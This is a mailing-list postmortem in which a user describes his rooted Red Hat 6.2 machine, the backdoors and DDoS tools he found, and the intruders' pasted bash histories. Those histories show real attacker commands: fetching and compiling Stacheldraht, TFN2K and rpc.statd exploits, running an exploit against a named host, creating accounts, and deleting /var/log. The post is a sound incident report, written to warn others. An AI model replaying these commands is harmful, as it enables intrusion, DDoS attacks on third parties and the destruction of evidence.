postmortem

[Bob Blick]

Hi Everyone,

Just thought I'd give yall an update on my RH6.2 box that was rooted.

Everything in /var/log was deleted. If they had merely emptied the logs, I
would not have noticed them for quite a while, since this is a machine I
put online about 6 months ago in the hopes of turning it into a weather
station and doing some remote robotics type of stuff, but it's basically
been ignored by me. But I have the habit of typing "last -20" whenever I
log in anywhere, and it said something like "wtmp does not exist. perhaps
the log was deleted". At that point I checked /var/log and saw there were
no logs at all and shut the machine down.

Today I brought the machine to my office and fired it up. /home showed new
directories "cgi" and "guest".

/etc/passwd and /etc/shadow showed a new user "cgi" and /etc/shadow- and
/etc/passwd- showed them plus user "tmp".

/etc/group and /etc/gshadow were normal, but /etc/group- and /etc/gshadow-
showed group "tmp".

In /root there was a .BitchX directory full of source code, and a Makefile.
I found evidence of programs untarred and compiled in a few directories. In
/tmp there was .xdcc, iroffer, and something called "cool" that was a
binary executable with no source so I don't know what it is, and there was
no clear text in the binary.

In the /home/httpd/cgi-bin directory there was a program called "...". That
is three dots. It's a binary, about 13k in size, and had some text in it,
with html pronouncing itself to be a backdoor program executor. Cute, just
hop in with a browser now.

User "stan" is a valid account of a new user who has never logged in, but
in his directory there is a new directory "stacheldrahtV4" and it's been
compiled. Looks like a nasty program with all sorts of devious features.
Subdirectories include "blowfish","tubby", and "telnetc".

I scanned the source of a lot of these programs, and it looks like they got
into the machine by exploiting rpc.statd. Never knew what that program was
for, you better believe I will make damn sure it never gets into anything
of mine ever again.

I found an ncftp.conf file in one of the directories, forget which one.

OK, so they weren't very good about cleaning up, and had deleted the logs
so I don't know where they came from. However, one thing they didn't clean
up were the .bash_history files! I am including them now for your pleasure.
At the end of root's you will see where I logged in and shut the machine
down, then after I logged in today I did very little before exploring with
mc(midnight commander). I haven't deleted anything or reformatted yet, so
if anyone has any suggestions of more things to do I can still do it.

Cheerful regards,

Bob Blick

root's .bash_history, looks like a lot rolled off the top:
rm -rf *.c
rm -rf execute_me
rm -rf s.sh
whereis irc
whereis BitchX
ftp ftp..bitchx.org
ftp ftp.bitchx.org
ls
gzip -d wget-1.5.3.tar.gz
tar -xf wget-1.5.3.tar
ls
rm *.tar
gzip -d ircii-pana-1.0c18.tar.gz
tar -xf ircii-pana-1.0c18.tar
ls
tar -xf ircii-pana-1.0c18.tar
ls
cd BitchX
ls
./configure
lls
make install
ls
cd ..
ls
rm -rf *.tar
rm -rf BitchX
cd wget-1.5.3
./configure
make install
cd ..
ls
rm -rf wg*
ls
ls
ftp ftp.bitchx.org
ls
gzip -d t.tar.gz
tar -xf t.tar
cd BitchX
./configure
make install
ls
ps -aux
cat /rpoc/cpuinfo
cat /proc/cpuinfo
make install
ps -aux
kill -9 9908
ls
whereis BitchX
BitchX gay irc.aohell.org
su games
ls
exit
last -20
tail /var/log/messages
mc
date
exit
/sbin/shutdown -h now
exit
last -20
mc

now "guest" .bash_history:
cd /tmp
ncftpget -u temp -p xdcc 24.15.103.218 . 'crpt3.tgz'
tar xzvf crpt3.tgz 
rm crpt3.tgz 
cd .crpt
pico egg.conf
./setup
cd ..
rm -rf .crpt/
exit
w
cd /tmp
ncftpget -u temp -p xdcc 24.14.254.96 . 'xdcc.tgz'
tar xzvf xdcc.tgz 
rm xdcc.tgz 
cd .xdcc
pico corrupt.conf 
TERM=vt100
pico corrupt.conf 
df -H
./iroffer -b corrupt.conf 
telnet 204.170.52.1
telnet 204.168.155.2
telnet 203.75.170.12
telnet ns1.sharpweb.net
cd /tmp
cd .xdcc
ls
pico corrupt.conf 
killall -9 iroffer
./iroffer -b corrupt.conf 
telnet cluster1.tel.uva.es
exit

lots of addresses there, one was in Australia, one was in Taiwan, and you
see the one in Spain. Probably they had no right to be in any of them.

the .bash_history for "cgi" was one line: 
free
I hope they were disappointed to find only 32 meg ram.

finally the .bash_history in /home/ftp:
cd /home
ls
cd guest
l
ls
cd guest
ls
ls -al
cd ..
ls
cd /tmp
ls -al
cd .xdcc
ls
pico corrupt.conf
ls
./iroffer
./iroffer corrupt.conf
ls
cd ..
ls
cd ..
ls
cd /home
ls
ls -al
cd guest
ls
 -al
ls -al
cd .ncftp
ls
ls -al
cd firewall
ls
cd ..
cd ..
ls
cd cgi
ls
ls -al
cd ..
cd bob
ls -al
cd ..
ls
cd stan
ls
ls -al
ls
ls -al
ls
wget
file:///C:/Documents%20and%20Settings/DUKE/Desktop/www.hack.co.za.tar/www.ha
ck.co.za/dos/ddos/stachel-yps.tar.gz
wget www.hack.co.za.tar/www.hack.co.za/dos/ddos/stachel-yps.tar.gz
wget www.hack.co.za/www.hack.co.za/dos/ddos/stachel-yps.tar.gz
wget http://packetstorm.securify.com/distributed/stachel.tgz
gzip -d stachel.tgz
tar -xf stachel.tar
ls
cd 
cd stacheldrahtV4
cd /tmp
sl
ls
cd .tmp
ls
find stacheldrahtV4
\
locate stacheldrahtV4
find stacheldrahtV4
locate stacheldrahtV4
ls
ls
ls -al
cd .xdcc
ls
cd /home
ls
cd guest
ls
ls -al
cd /
ls
ls /tmp
ls -al
cd BitchX
ls
cd /tmp
ls
wget http://packetstorm.securify.com/distributed/stachel.tgz
gzip -d stachel.tgz
tar -xf stachel.tar
ls
cd stacheldrahtV4 
ls
make
ls
./telnetc
cd telnetc
ls
make
./client
./sclient
ls
./client
ls
cd ..
ls
./mserv
ps -x
ls
kill -9 9685 9686
ls
cd mserv
cd leaf
ls
make
/usr/sbin/adduser tmp
passwd tmp
ls
pass tmp
passwd tmp
ps -x
/usr/sbin/userdel tmp
wget http://packetstorm.securify.com/distributed/tfn2k.tgz
ls
cd ..
ls
cd ..
ls
rm -rf st*
rm t.tar
wget http://packetstorm.securify.com/distributed/tfn2k.tgz
gzip -d tfn2k.tgz
tar -xf tfn2k.tar
cd tfn2k
ls
make
su root
kill -9 6073
users
su root
su root
exit
rm -rf tfn*
mkdir .tmp
cd .tmp
ls
wget http://packetstorm.securify.com/Exploit_Code_Archive/statdx86.c
gcc statdx86.c -o st
./st
wget http://packetstorm.securify.com/0008-exploits/statdx.c
gcc statdx.c -o statdx
./statdx
./statdx -h
./statdx -d 0 danegus.vpsa.buffalo.edu
exit
rm -rf /var/log/*
exit